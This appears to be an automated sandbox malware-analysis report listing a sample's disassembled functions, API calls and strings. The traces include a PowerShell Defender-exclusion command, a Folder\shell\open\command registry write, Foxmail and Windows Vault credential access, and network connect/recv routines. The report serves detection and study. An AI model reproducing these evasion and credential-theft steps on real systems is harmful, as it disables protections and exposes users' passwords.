Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: AllocCreateDirectoryProcessSleepVirtualWindowslstrlen
String ID: \System32\cmd.exe
API String ID: 2560724043-2003734499
Opcode ID: 486c18ab22c3b9886fe59545ef55790a4f70d8169df61fa0a0fe4a258bdcfec3
Instruction ID: 276914a922f106610b618cc24e3532c173156154720651a2f31ad538a4d40d39
Opcode Fuzzy Hash: 486c18ab22c3b9886fe59545ef55790a4f70d8169df61fa0a0fe4a258bdcfec3
Instruction Fuzzy Hash: FF118F72A40218BBE7109BA5DC8AFEF7B7CEF04751F004435F60AA60D1CA74AE04C6A9

Uniqueness

Uniqueness Score: -1.00%

Function 004157F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 55memorystringCOMMON

Download Yara Rule

APIs

EntryPoint.DBKYOVYK(00000800,00000000,00000000,?,?,?,?,?,0041596F,?,?,?,0040683C,75A901C0,00000000,00000000), ref: 00415801

Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,?,00415E3C,02800000,?,?,00000000,?,?,00417531), ref: 00401006
Part of subcall function 00401000: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00417531), ref: 0040100D

VirtualProtect.KERNEL32(00000000,000007D0,00000040,?,00000000,00000000,?,?,?,?,?,0041596F,?,?,?,0040683C), ref: 00415832
VirtualAlloc.KERNEL32(00000600,000001FE,00001000,00000040,?,?,?,?,?,0041596F,?,?,?,0040683C,75A901C0,00000000), ref: 00415845
GetWindowsDirectoryW.KERNEL32(00000000,00000104,?,?,?,?,?,0041596F,?,?,?,0040683C,75A901C0,00000000,00000000), ref: 00415853
lstrlenW.KERNEL32(00000000,?,?,?,?,?,0041596F,?,?,?,0040683C,75A901C0,00000000,00000000), ref: 0041585A

Strings

\System32\cmd.exe, xrefs: 0041586D

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: HeapVirtual$AllocAllocateDirectoryEntryPointProcessProtectWindowslstrlen
String ID: \System32\cmd.exe
API String ID: 3818048147-2003734499
Opcode ID: cd995840171e45d11126bbbd1577471655121aa80981cc033fd89250d4f37203
Instruction ID: 62e0d64b5b5a69a2e0efdb8fb0c95433919bf6f2a6e4dcc07185956df4613091
Opcode Fuzzy Hash: cd995840171e45d11126bbbd1577471655121aa80981cc033fd89250d4f37203
Instruction Fuzzy Hash: 1E01D272B40205BBEB105BB49C8AFEB3B68DB45710F108465F744BA2C1CAB96D408798

Uniqueness

Uniqueness Score: -1.00%

Function 0041570F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38registrystringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00415A4C,0041C6B8,?,?,00415A4C,0041C6B8,?), ref: 00415717
RegOpenKeyExA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command,00000000,00020006,?,?,?,00415A4C,0041C6B8,?), ref: 00415734
SetLastError.KERNEL32(00000000,?,?,00415A4C,0041C6B8,?), ref: 0041573F
RegSetValueExA.ADVAPI32(?,0041C6B8,00000000,00000001,00415A4C,00000000,?,?,00415A4C,0041C6B8,?), ref: 00415757
RegCloseKey.ADVAPI32(?,?,?,00415A4C,0041C6B8,?), ref: 00415762

Strings

Software\Classes\Folder\shell\open\command, xrefs: 0041572A

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: CloseErrorLastOpenValuelstrlen
String ID: Software\Classes\Folder\shell\open\command
API String ID: 1613093083-2536721355
Opcode ID: e4d084bbe3e550a93e0e439ad53c457f99a8f582c63c50fff9416cddd4e9a286
Instruction ID: d68be268d5a6489a80445dc8630ff45b33c3dff824794d152618c0fc3f7a718f
Opcode Fuzzy Hash: e4d084bbe3e550a93e0e439ad53c457f99a8f582c63c50fff9416cddd4e9a286
Instruction Fuzzy Hash: BDF09635540214FBDF111FA0DD4EFDA3F69DF08750F104061F916A6190C7758E40AB98

Uniqueness

Uniqueness Score: -1.00%

Function 00409E8D Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,0040AA17,00000000), ref: 00409EAA
GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 00409EBE
GetProcAddress.KERNEL32(00000000,RtlSetLastWin32Error), ref: 00409ECB

Strings

ntdll.dll, xrefs: 00409EA5
RtlNtStatusToDosError, xrefs: 00409EB8
RtlSetLastWin32Error, xrefs: 00409EC0

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
API String ID: 667068680-2897241497
Opcode ID: 8261d4aed7c937ce257853d88075a1b98efcf1b24ac656a6c5083befed314932
Instruction ID: f8e585f8ba1853438c88d774b9b78084d0262bf7905d67ef528c50d3f552bd4a
Opcode Fuzzy Hash: 8261d4aed7c937ce257853d88075a1b98efcf1b24ac656a6c5083befed314932
Instruction Fuzzy Hash: 4DF03031A0032667CB219B65AC29E677B98A954F913090027ED08E33F1E778AD4496D8

Uniqueness

Uniqueness Score: -1.00%

Function 39D3FA18 Relevance: 10.2, Strings: 8, Instructions: 227COMMON

Download Yara Rule

Strings

Preload, xrefs: 39D3FBD9
@, xrefs: 39D3FC0E
E0010411, xrefs: 39D3FBBD
Keyboard Layout\Preload, xrefs: 39D3FA46
00000409, xrefs: 39D3FACB, 39D3FC9C, 39D3FCAE
Active, xrefs: 39D3FB52, 39D3FB5A, 39D3FC82
E0010412, xrefs: 39D3FBCA
Keyboard Layout, xrefs: 39D3FB04

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID: 00000409$@$Active$E0010411$E0010412$Keyboard Layout$Keyboard Layout\Preload$Preload
API String ID: 0-1236451353
Opcode ID: 256beb1dd112d9b321d7bf3547cdee94044c9e9780927e3f732bb4d56c9d2a55
Instruction ID: 5cb85b1215cafaab14a7088aa3dc112cb99b09389b1044f73cf8ac23045bb7e4
Opcode Fuzzy Hash: 256beb1dd112d9b321d7bf3547cdee94044c9e9780927e3f732bb4d56c9d2a55
Instruction Fuzzy Hash: 5B813EB590124CEFEF10DFA4D986EEDBBB9EB48345F508426F902FA150D734990ADB50

Uniqueness

Uniqueness Score: -1.00%

Function 39D0BD7A Relevance: 10.0, Strings: 8, Instructions: 30COMMON

Download Yara Rule

Strings

Rotate, xrefs: 39D0BDAF
PressAndTap, xrefs: 39D0BDA3
UNKNOWN, xrefs: 39D0BD9D
Begin, xrefs: 39D0BDC7
End, xrefs: 39D0BDC1
TwoFingerTap, xrefs: 39D0BDA9
Pan, xrefs: 39D0BDB5
Zoom, xrefs: 39D0BDBB

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID: Begin$End$Pan$PressAndTap$Rotate$TwoFingerTap$UNKNOWN$Zoom
API String ID: 0-3631254312
Opcode ID: f9256a8cef582697cf519c49b7f98a95a93f463436c0adcc01c14b40eeaefca2
Instruction ID: 76e44b8fd22111d91e304db6faa1d847c6204c4ce2fdd11329aa266da7fc0b4b
Opcode Fuzzy Hash: f9256a8cef582697cf519c49b7f98a95a93f463436c0adcc01c14b40eeaefca2
Instruction Fuzzy Hash: C8E046FD29A003076C49BA3CA1765746948F7A6018BC9019A6207DBF2DC01DDD0259D5

Uniqueness

Uniqueness Score: -1.00%

Function 00412CD5 Relevance: 9.2, APIs: 6, Instructions: 175threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00412F8A: EntryPoint.DBKYOVYK(00002000,?,00000000,?,?,?,00000000), ref: 00412FA1
Part of subcall function 00412F8A: EntryPoint.DBKYOVYK(00002000,00002000,?,00000000,?,?,?,00000000), ref: 00412FA9
Part of subcall function 00412F8A: recv.WS2_32(00000000,00000000,00000008,00000000), ref: 00412FD2
Part of subcall function 00412F8A: recv.WS2_32(00000000,?,?,00000000), ref: 00413018

InetNtopW.WS2_32(00000002,?,?,00000802), ref: 00412D6F
CreateThread.KERNEL32(00000000,00000000,00412ECC,?,00000000,?), ref: 00412E6A

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: EntryPointrecv$CreateInetNtopThread
String ID:
API String ID: 1514862470-0
Opcode ID: fa38d6e1b5ed95bd1eda119b6f56dbc2bbf4989083d003776f4fc0d80b1f971b
Instruction ID: 256552469a624eb3b29064bfc31c407aa10f75c1ed3cd10f6014ce91af15ea66
Opcode Fuzzy Hash: fa38d6e1b5ed95bd1eda119b6f56dbc2bbf4989083d003776f4fc0d80b1f971b
Instruction Fuzzy Hash: 5F51F831D00209AADB10CFA0DD45BEFBBB5FF49304F04806AE945AF192D7B85995CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00410514 Relevance: 9.1, APIs: 6, Instructions: 73filememoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 00410548
GetFileSizeEx.KERNEL32(00000000,?,?,00000000,00000000,00000000), ref: 0041055E
LocalAlloc.KERNEL32(00000040,?,00000000,?,00000000,00000000,00000000), ref: 00410579
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00410591
CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 004105B4

Part of subcall function 004105C0: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 004105DF
Part of subcall function 004105C0: LocalAlloc.KERNEL32(00000040,00000000,?,00410532,00000000,00000000,?,00000000,00000000,00000000), ref: 004105ED
Part of subcall function 004105C0: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00410603
Part of subcall function 004105C0: LocalFree.KERNEL32(00000000,?,00410532,00000000,00000000,?,00000000,00000000,00000000), ref: 00410611

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: FileLocal$AllocBinaryCryptString$CloseCreateFreeHandleReadSize
String ID:
API String ID: 4225742195-0
Opcode ID: 536a4beddb239463d3df8e535a72cefee2e1ea7654c92b21ba0a92c4329887ac
Instruction ID: 225b384aa49b5cc3e1198cc5a58ede4939a65b660fbd2582edb4e6ff9293d2b2
Opcode Fuzzy Hash: 536a4beddb239463d3df8e535a72cefee2e1ea7654c92b21ba0a92c4329887ac
Instruction Fuzzy Hash: 8D11AE31600215FBDB21DB64DC58AEF7BBAEB45750B004026F906E6290D7B49EC0CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041199F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 68registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,00000000,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 00404613
Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 0040462A
Part of subcall function 0040460A: lstrcpyW.KERNEL32(75A901C0,00415E06), ref: 00404649

RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,?,?,?,?,0041213F,?,?), ref: 004119D3
RegCloseKey.ADVAPI32(00000000,?,?,0041213F,?,?), ref: 00411A5D

Part of subcall function 00414D78: RegQueryValueExW.KERNEL32(?,75A901C0,00000000,75A901C0,00000000,00000000,?,00000000,?,?,?,?,0041543B,?,?,00000000), ref: 00414D9B
Part of subcall function 00414D78: EntryPoint.DBKYOVYK(00000000,?,0041543B,?,?,00000000,?,75A901C0,00000000,?,?,?,?,00417610,?), ref: 00414DA8
Part of subcall function 00414D78: RegQueryValueExW.KERNEL32(?,75A901C0,00000000,75A901C0,00000000,00000000,?,0041543B,?,?,00000000,?,75A901C0,00000000), ref: 00414DBF

Part of subcall function 00406F1D: VirtualFree.KERNELBASE(?,00000000,00008000,00406CE1,00000000,?,00414EA7,?,?,00417742), ref: 00406F25

RegCloseKey.ADVAPI32(?,00000000,ServiceDll,?,?,?,0041213F,?,?), ref: 00411A0D

Strings

SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 004119AC
ServiceDll, xrefs: 004119E1

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: CloseQueryValuelstrlen$EntryFreeOpenPointVirtuallstrcpy
String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll
API String ID: 1545312243-387424650
Opcode ID: 42479cc79dd440597237ba7194fe61cedbff0732ce4e0c210a1b5973624361ce
Instruction ID: 722f1de05e2d018d91f66555f61890410d22520e678c970ce7b42cae90943de1
Opcode Fuzzy Hash: 42479cc79dd440597237ba7194fe61cedbff0732ce4e0c210a1b5973624361ce
Instruction Fuzzy Hash: 6C212F71E01219EBCF10EFA0D9959EEBB78AF04785F11006EEA0277291DB785F44CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00417083 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56processCOMMON

Download Yara Rule

APIs

EntryPoint.DBKYOVYK(00000100,?,75A901C0,00000000,?,?,004176AC), ref: 00417090

Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,?,00415E3C,02800000,?,?,00000000,?,?,00417531), ref: 00401006
Part of subcall function 00401000: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00417531), ref: 0040100D

EntryPoint.DBKYOVYK(00000100,00000100,?,75A901C0,00000000,?,?,004176AC), ref: 0041709B
GetModuleFileNameA.KERNEL32(00000000,00000000,00000100,?,?,?,?,?,?,75A901C0,00000000,?,?,004176AC), ref: 004170BB
WinExec.KERNEL32(00000000,00000000), ref: 004170FA

Strings

powershell Add-MpPreference -ExclusionPath , xrefs: 004170C6

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: EntryHeapPoint$AllocateExecFileModuleNameProcess
String ID: powershell Add-MpPreference -ExclusionPath
API String ID: 1481001202-2194938034
Opcode ID: 53e12e4fe94f7ca2207ab81f518e4ad48a895fca5eda7dd131de737171475a20
Instruction ID: 0bfc67003d939383ad8dcf94610541c698eda91eb48cc477bfe475b9030fbef1
Opcode Fuzzy Hash: 53e12e4fe94f7ca2207ab81f518e4ad48a895fca5eda7dd131de737171475a20
Instruction Fuzzy Hash: 8D016D2160024176C7115F765C45FEBBF7CDF8B754F2400BEF448AB283C565580283B8

Uniqueness

Uniqueness Score: -1.00%

Function 004107D1 Relevance: 8.8, APIs: 7, Instructions: 35COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(?,00000000,00000000,00410461), ref: 004107E8
LocalFree.KERNEL32(?,00000000,00000000,00410461), ref: 004107F3
LocalFree.KERNEL32(?,00000000,00000000,00410461), ref: 004107FE
LocalFree.KERNEL32(?,00000000,00000000,00410461), ref: 00410809
LocalFree.KERNEL32(?,00000000,00000000,00410461), ref: 00410814
LocalFree.KERNEL32(?,00000000,00000000,00410461), ref: 0041081F
LocalFree.KERNEL32(00000000,00000000,00000000,00410461), ref: 00410822

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: FreeLocal
String ID:
API String ID: 2826327444-0
Opcode ID: 3f39ecd89f520af338196d7a9c51ca1e024b73b6c5fa4d13df99f19f323b0fdf
Instruction ID: b7c0ad6012440c95eedcc76b0f191dd9dc063dedd4c772e5d3cbd9728ca02a94
Opcode Fuzzy Hash: 3f39ecd89f520af338196d7a9c51ca1e024b73b6c5fa4d13df99f19f323b0fdf
Instruction Fuzzy Hash: 59F09731014B149BD7367B2ADC48BA7B7E1BF80355F15083AD18211AB0C7B9B8D6DF98

Uniqueness

Uniqueness Score: -1.00%

Function 0040C237 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,software\Aerofox\FoxmailPreview,00000000,00020019,?), ref: 0040C252
RegQueryValueExA.ADVAPI32(?,Executable,00000000,00000000,0041E7B8,?), ref: 0040C279
PathRemoveFileSpecA.SHLWAPI(0041E7B8), ref: 0040C284

Strings

Executable, xrefs: 0040C271
software\Aerofox\FoxmailPreview, xrefs: 0040C248

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: FileOpenPathQueryRemoveSpecValue
String ID: Executable$software\Aerofox\FoxmailPreview
API String ID: 3687894118-2371247776
Opcode ID: 7332fcc38531e5178b62f7e5ab977b1e26f3466f6daa852e16a9da5b4de81bff
Instruction ID: dd41a0a97a002d33d3863767e6c46329a441d11cc44d771448beb862b31120bb
Opcode Fuzzy Hash: 7332fcc38531e5178b62f7e5ab977b1e26f3466f6daa852e16a9da5b4de81bff
Instruction Fuzzy Hash: EAF0377464020CBFEB108B91DD86FDA7BBCD749B44F2041AAFD01B21C1E3B4A945A55D

Uniqueness

Uniqueness Score: -1.00%

Function 00412C20 Relevance: 7.6, APIs: 5, Instructions: 70networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000001,00000006), ref: 00412C3A
gethostbyname.WS2_32(?), ref: 00412C43
htons.WS2_32(?), ref: 00412C67
InetNtopW.WS2_32(00000002,?,?,00000802), ref: 00412C98
connect.WS2_32(00000000,?,00000010), ref: 00412CB1

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: InetNtopconnectgethostbynamehtonssocket
String ID:
API String ID: 2393792429-0
Opcode ID: 69dbbc010f091b41df617c9d1138db959ac672b0861ef684ac295178bdee82e3
Instruction ID: 524a7fa97140249c400ef92f4fce96b3c848d00403c33a573cdd21a6356f97ad
Opcode Fuzzy Hash: 69dbbc010f091b41df617c9d1138db959ac672b0861ef684ac295178bdee82e3
Instruction Fuzzy Hash: BE11AF729002187BDB1097A4AC4AFEB7BACEB09724F008476FA55D61D1E6B48D4487A4

Uniqueness

Uniqueness Score: -1.00%

Function 00414A4A Relevance: 7.5, APIs: 5, Instructions: 44processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414A68
Process32FirstW.KERNEL32(00000000,0000022C), ref: 00414A7D
Process32NextW.KERNEL32(00000000,0000022C), ref: 00414A95
CloseHandle.KERNEL32(00000000,?,00000000), ref: 00414AA0
CloseHandle.KERNEL32(00000000,?,00000000), ref: 00414AB1

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
String ID:
API String ID: 1789362936-0
Opcode ID: 40a3f02a73de6108611ef5768c833aa54d64a0a59396be2ac4d9f36ad954ac80
Instruction ID: fbac1351c89796dff384597b250a7e7f656bf48eb910e1687153f02e98cc9eb7
Opcode Fuzzy Hash: 40a3f02a73de6108611ef5768c833aa54d64a0a59396be2ac4d9f36ad954ac80
Instruction Fuzzy Hash: 7F01D631640216BBEB205BE4AC4CBFF76BCDF85765F208166E505921D0D7788C818A5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040E2DA Relevance: 7.5, APIs: 5, Instructions: 25COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,00000000,?,00000000,0040DA3E,?,00000000), ref: 0040E2EB
FreeLibrary.KERNEL32(?,?,00000000,0040DA3E,?,00000000), ref: 0040E2FB
FreeLibrary.KERNEL32(?,?,00000000,0040DA3E,?,00000000), ref: 0040E309
FreeLibrary.KERNEL32(?,?,00000000,0040DA3E,?,00000000), ref: 0040E317
FreeLibrary.KERNEL32(?,?,00000000,0040DA3E,?,00000000), ref: 0040E325

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: afb45c257bd751c7701f99fa404c590f472991ea3dd4a86a09492593bde9e929
Instruction ID: 81f6e92512c78e4f8946192f14669a9c45134428112dab3495f13acf91656ab3
Opcode Fuzzy Hash: afb45c257bd751c7701f99fa404c590f472991ea3dd4a86a09492593bde9e929
Instruction Fuzzy Hash: 01F09271A02A16BAE7095FB58C84B85FE65FF48260F00436BD62C53210CB7164209FE0

Uniqueness

Uniqueness Score: -1.00%

Function 0040DF46 Relevance: 7.5, APIs: 5, Instructions: 25COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,00000000,0040D34E), ref: 0040DF57
FreeLibrary.KERNEL32(?), ref: 0040DF67
FreeLibrary.KERNEL32(?), ref: 0040DF75
FreeLibrary.KERNEL32(?), ref: 0040DF83
FreeLibrary.KERNEL32(?), ref: 0040DF91

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: afb45c257bd751c7701f99fa404c590f472991ea3dd4a86a09492593bde9e929
Instruction ID: 81f6e92512c78e4f8946192f14669a9c45134428112dab3495f13acf91656ab3
Opcode Fuzzy Hash: afb45c257bd751c7701f99fa404c590f472991ea3dd4a86a09492593bde9e929
Instruction Fuzzy Hash: 01F09271A02A16BAE7095FB58C84B85FE65FF48260F00436BD62C53210CB7164209FE0

Uniqueness

Uniqueness Score: -1.00%

Function 0040BD1D Relevance: 7.5, APIs: 2, Strings: 3, Instructions: 17COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00552B20,?,00405D9F), ref: 0040BD24
LeaveCriticalSection.KERNEL32(00552B20), ref: 0040BD59

Part of subcall function 00402771: TerminateThread.KERNEL32(00552F3C,00000000,00552B78,00410CA6,?,?,00403683), ref: 0040277D
Part of subcall function 00402771: CloseHandle.KERNEL32(00552F3C,?,?,00403683), ref: 00402785

Part of subcall function 00402746: CreateThread.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0040275B

Strings

d+U, xrefs: 0040BD33
l+U, xrefs: 0040BD44
+U, xrefs: 0040BD1E

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: CriticalSectionThread$CloseCreateEnterHandleLeaveTerminate
String ID: +U$d+U$l+U
API String ID: 1885733074-4275183886
Opcode ID: 3ca142d27879ec4cb877d3dbc5a49e7102e11f7b2efcf77f0631aca398c6b0a2
Instruction ID: 1c0765e19dfef06a815ea11ac3a853fa5e36ce46b18582c842f1035714ab3cd1
Opcode Fuzzy Hash: 3ca142d27879ec4cb877d3dbc5a49e7102e11f7b2efcf77f0631aca398c6b0a2
Instruction Fuzzy Hash: D2D0EC3198561167D3157B10587DFDA2A65AB63317F11803BE516221E0CBB8198CE79D

Uniqueness

Uniqueness Score: -1.00%

Function 0040DB12 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 259COMMON

Download Yara Rule

APIs

Part of subcall function 0040DE78: LoadLibraryA.KERNEL32(vaultcli.dll,00000000,0040DB38), ref: 0040DE80

FreeLibrary.KERNEL32(?), ref: 0040DE24

Strings

4, xrefs: 0040DDEC
Internet Explorer, xrefs: 0040DBC8, 0040DCEB
8, xrefs: 0040DDE7

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Library$FreeLoad
String ID: 4$8$Internet Explorer
API String ID: 534179979-747916358
Opcode ID: ae202f107e02cf4bf0fa937bc14afba5fe48d501d56cc940ab3e3e6b8a9a574c
